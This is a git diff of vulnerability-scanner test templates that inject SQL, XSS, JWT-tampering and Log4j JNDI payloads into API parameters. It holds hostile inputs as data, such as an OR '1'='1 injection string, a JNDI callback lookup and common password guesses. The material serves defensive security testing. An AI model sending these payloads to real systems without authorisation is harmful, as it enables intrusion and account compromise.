@@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -105,7 +105,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -156,7 +157,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -207,7 +209,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml index c2753f51d..8cf12e298 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -97,7 +97,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -200,7 +202,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml index b8fa4414b..3f59fbb0b 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -97,7 +97,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -200,7 +202,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Broken-User-Authentication/AlternateEncodingSQLi.yml b/Broken-User-Authentication/AlternateEncodingSQLi.yml index 1933258a3..387f68c2c 100644 --- a/Broken-User-Authentication/AlternateEncodingSQLi.yml +++ b/Broken-User-Authentication/AlternateEncodingSQLi.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -107,7 +107,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${encodingPayloads} + ${userKey}: ${userVal}${encodingPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -147,7 +148,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -188,7 +190,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AlternateEncodingSQLiGET.yml b/Broken-User-Authentication/AlternateEncodingSQLiGET.yml index 4147fd467..036b93c50 100644 --- a/Broken-User-Authentication/AlternateEncodingSQLiGET.yml +++ b/Broken-User-Authentication/AlternateEncodingSQLiGET.yml 
@@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -98,7 +98,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${encodingPayloads} + ${userKey}: ${userVal}${encodingPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -179,7 +181,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml b/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml index fa7a61ff3..418e323eb 100644 --- a/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml +++ b/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -98,7 +98,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${encodingPayloads} + ${userKey}: ${userVal}${encodingPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -179,7 +181,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Broken-User-Authentication/AuthBypassMultiCredentials.yml b/Broken-User-Authentication/AuthBypassMultiCredentials.yml index 811397ccb..e3ef4b975 100644 --- a/Broken-User-Authentication/AuthBypassMultiCredentials.yml +++ b/Broken-User-Authentication/AuthBypassMultiCredentials.yml @@ -79,15 +79,16 @@ api_selection_filters: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|^passwd$|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$" - extract: passwordkey + extractMultiple: passwordkey extract: respbody execute: type: single requests: - req: - modify_body_param: - passwordkey: + ${passwordkey}: - "${respbody}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml b/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml index 5aebda72f..6326cc1b3 100644 --- a/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml +++ b/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|^passwd$|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$" - extract: passwordKey + extractMultiple: passwordKey value: extract: passwordVal execute: @@ -86,11 +86,12 @@ execute: requests: - req: - modify_body_param: - passwordKey: + ${passwordKey}: - "${passwordVal}" - random - "123456" - qwerty + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml b/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml index 138efdc38..8ed983c49 100644 --- a/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml +++ b/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml 
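Review bot: The password-key regex in AuthBypassMultiCredentialsSingleParam.yml begins with the unanchored alternative `password`, so `extractMultiple: passwordKey` would presumably also select fields such as a confirmation or new-password parameter. The `@@ -86,11 +86,12 @@` hunk then submits the four candidate values for each selected key with `for_each_combination: true`, which multiplies login attempts for the account used in the run and can trip lockout or rate limiting before `validate` is reached. I would either anchor that alternative as `^password$`, like the rest of the list, or state the cost in the template: `# multiple password fields multiply login attempts; use a disposable test account`. AuthBypassMultiCredentials.yml uses the same regex.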
@@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml index 018eb5f08..6d63d021f 100644 --- a/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -157,7 +158,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -204,7 +206,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml b/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml index 1f0c33afc..207fcd5f0 100644 --- a/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml +++ b/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiGET.yml b/Broken-User-Authentication/BooleanBasedSQLiGET.yml index 0c9a114c3..55c451180 100644 
--- a/Broken-User-Authentication/BooleanBasedSQLiGET.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -108,7 +108,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${falseCasePayloads} + ${userKey}: ${userVal}${falseCasePayloads} + for_each_combination: true - validate: or: - response_code: @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -171,7 +173,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_query_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml index 373617677..77524f164 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|user_name|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -117,7 +117,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${falseCasePayloads} + ${userKey}: ${userVal}${falseCasePayloads} + for_each_combination: true - validate: or: - response_code: @@ -146,7 +147,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -178,7 +180,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiPOST.yml b/Broken-User-Authentication/BooleanBasedSQLiPOST.yml index 26f8ed344..2e893c2c0 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiPOST.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiPOST.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -108,7 +108,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${falseCasePayloads} + ${userKey}: ${userVal}${falseCasePayloads} + for_each_combination: true - validate: or: - response_code: @@ -137,7 +138,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -170,7 +172,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiXSS.yml b/Broken-User-Authentication/BooleanBasedSQLiXSS.yml index 478fdb572..b01fc103c 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiXSS.yml 
+++ b/Broken-User-Authentication/BooleanBasedSQLiXSS.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${booleanXSSPayloads} + ${userKey}: ${userVal}${booleanXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -154,7 +155,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -203,7 +205,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml b/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml index 8551ea86a..46ddbefd7 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -98,7 +98,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${booleanXSSPayloads} + ${userKey}: ${userVal}${booleanXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml b/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml index 0daf3696c..d48358957 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -98,7 +98,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${booleanXSSPayloads} + ${userKey}: ${userVal}${booleanXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/ErrorBasedSQLiXSS.yml b/Broken-User-Authentication/ErrorBasedSQLiXSS.yml index 8363b0f30..a9f81a888 100644 
--- a/Broken-User-Authentication/ErrorBasedSQLiXSS.yml +++ b/Broken-User-Authentication/ErrorBasedSQLiXSS.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${errorXSSPayloads} + ${userKey}: ${userVal}${errorXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -151,7 +152,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${errorXSSNegativePayloads} + ${userKey}: ${userVal}${errorXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -199,7 +201,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${errorXSSNegativePayloads} + ${userKey}: ${userVal}${errorXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml b/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml index 964ce2523..5a2e34af0 100644 --- a/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml +++ b/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml @@ -78,7 +78,7 @@ api_selection_filters: - authorization - auth-token - access-token - extract: headerKey + extractMultiple: headerKey value: contains_jwt: true wordLists: 
@@ -96,7 +96,8 @@ execute: requests: - req: - modify_header: - headerKey: "Bearer ${JWTPayloads}" + ${headerKey}: "Bearer ${JWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -135,7 +136,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -178,7 +180,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml b/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml index c690cd842..ed8522d80 100644 --- a/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml +++ b/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml @@ -78,7 +78,7 @@ api_selection_filters: - authorization - auth-token - access-token - extract: headerKey + extractMultiple: headerKey value: contains_jwt: true wordLists: @@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerKey: "Bearer ${JWTPayloads}" + ${headerKey}: "Bearer ${JWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -136,7 +137,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -179,7 +181,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml b/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml index 22c919618..797cbac9c 100644 
--- a/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml +++ b/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml @@ -78,7 +78,7 @@ api_selection_filters: - authorization - auth-token - access-token - extract: headerKey + extractMultiple: headerKey value: contains_jwt: true wordLists: @@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerKey: "Bearer ${JWTPayloads}" + ${headerKey}: "Bearer ${JWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -139,7 +140,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -185,7 +187,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/Log4jRequestParams.yml b/Broken-User-Authentication/Log4jRequestParams.yml index b6ada4050..382098253 100644 --- a/Broken-User-Authentication/Log4jRequestParams.yml +++ b/Broken-User-Authentication/Log4jRequestParams.yml @@ -77,12 +77,12 @@ api_selection_filters: for_one: key: regex: ".*" - extract: bodyKey + extractMultiple: bodyKey - query_param: for_one: key: regex: ".*" - extract: queryKey + extractMultiple: queryKey execute: type: single 
@@ -91,9 +91,11 @@ execute: - send_ssrf_req: url: "https://test-services.akto.io/store_uuid/3523ddf7-51ef-462b-a452-f33246aae6bb" - modify_body_param: - bodyKey: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + ${bodyKey}: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + for_each_combination: true - modify_query_param: - queryKey: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + ${queryKey}: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + for_each_combination: true validate: response_payload: length: diff --git a/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml b/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml index 504843a1b..c4bb84a0c 100644 --- a/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml +++ b/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml @@ -81,12 +81,12 @@ api_selection_filters: for_one: key: contains_either: ${attempt_Ids} - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: contains_either: ${attempt_Ids} - extract: changed_query_key + extractMultiple: changed_query_key wordLists: attempt_Ids: - "name" @@ -118,9 +118,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialCharacters} + ${changed_body_key}: ${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialCharacters} + ${changed_query_key}: ${specialCharacters} + for_each_combination: true validate: or: - response_payload: diff --git a/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml b/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml index 75ccd94df..046dd5804 100644 --- a/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml 
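Review bot: The two `for_each_combination: true` lines added in Log4jRequestParams.yml fan the lookup string out to every body and query key, since both filters use `regex: ".*"`, yet every variant carries the same hard-coded callback identifier that `send_ssrf_req` registers. A recorded callback can therefore not be tied to the parameter that triggered it, and whoever triages the finding has to re-test key by key. I would say so in the template, e.g. `# callback id is shared by all keys; a hit does not identify the parameter`, or derive the identifier per request if the engine offers that. The `validate` block continues outside the hunk.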
+++ b/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml @@ -45,7 +45,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value diff --git a/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml b/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml index 7f39c114a..9e2de306c 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml @@ -93,7 +93,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' OR '1'='1 --" @@ -128,7 +128,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -177,7 +178,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -226,7 +228,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml b/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml index 2d4395262..289326698 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml @@ 